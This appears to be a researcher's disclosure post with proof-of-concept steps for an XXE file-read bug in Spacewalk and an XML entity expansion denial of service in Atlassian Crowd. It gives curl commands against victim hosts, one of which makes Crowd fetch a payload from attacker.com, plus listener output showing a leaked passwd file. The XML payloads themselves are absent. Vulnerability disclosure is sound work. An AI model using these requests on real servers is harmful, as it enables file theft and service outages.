Proof of Concept exploit for CVE-2020-1693 – Spacewalk <= 2.9 XXE

CVE Description
A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.

Local file read

External DTD:

XML-RPC call for final exploit

curl -X POST -sik https://victim.tld/rpc/api -H ‘Content-Type: application/xml’ –data @xxe-ftp-exfil.xml

After execution and running an FTP listener, you will see the remote DTD fetch, along with the following exfiltration of the local file.

"GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151"

2020/02/17 00:00:00 [*] Connection Accepted from [x.x.x.x:00000]
USER: anonymous
PASS: [email protected]
/root:x:0:0:root:
/root:
/bin
2020/02/17 00:00:00 [*] Closing FTP Connection

CVE-2019-20104 – Atlassian Crowd OpenID client vulnerable to Remote DoS via XML Entity Expansion

Atlassian Crowd is a single sign-on and user identity solution software for the web. Crowd comes with a built in OpenID client for testing OpenID integrations, by supplying the test client with a URL hosted with a malicious payload, an attacker can remotely DoS the Crowd instance by XML Entity Expansion that consumes all memory and subsequently crashes the application.

After studying the OpenID protocol and understanding what kind of XML is expected, I was able to craft the following response.

Proof of Concept XML XRDS payload:

Once hosted somewhere, invoking the following will execute the payload on the crowd instance:

curl -sik 'https://crowd.victim.tld/openidclient/login!login.action' --data 'openid_identifier=https%3A%2F%2Fattacker.com%2Fxrds.php'

Now, the server will expand entities until memory is consumed and produce output such as:

Exception in thread "AsyncFileHandlerWriter-1300109446" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-7" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-8" Exception in thread "http-nio-8095-exec-6" java.lang.OutOfMemoryError: Java heap space
java.lang.OutOfMemoryError: Java heap space
Exception in thread "http-nio-8095-exec-4" java.lang.OutOfMemoryError: GC overhead limit exceeded

Atlassian has responded to the issue via Bug Bounty program on Bugcrowd.com/atlassian and has issued fixes.

Software has been fixed as of:

  • 3.2.11
  • 3.3.8
  • 3.4.7
  • 3.5.2
  • 3.6.2
  • 3.7.1
  • 4.0.0

CVE and CWD references:

https://jira.atlassian.com/browse/CWD-5526

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20104

Happy Hunting 😊